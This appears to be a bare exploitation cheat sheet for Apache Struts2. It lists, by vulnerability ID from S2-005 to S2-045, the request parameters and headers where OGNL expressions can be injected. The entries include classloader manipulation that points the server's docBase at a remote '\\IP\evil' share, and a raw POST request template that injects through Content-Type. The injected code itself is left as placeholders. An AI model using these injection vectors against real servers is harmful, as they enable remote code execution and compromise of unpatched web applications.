S2-005
target.action?('#ONGL')(a)=true

S2-008
target.action?debug=browser&object=#OGNL

S2-009
target.action?class.classLoader.jarPath=

S2-016
target.action?redirect:${#OGNL}

S2-020
target.action?Class.ClassLoader.resources.dirContext.docBase=\\IP\evil
target.action?class['classLoader'].resources.dirContext.docBase=\\IP\evil
target.action?top.Class.ClassLoader.resources.dirContext.docBase=\\IP\evil

S2-032

target.action?method:#OGNL

S2-037

/orders/3/(#OGNL)?(#OGNL):aa.json

S2-045

POST /S2-045/target.action HTTP/1.1
Content-Type: %{#OGNL}
....












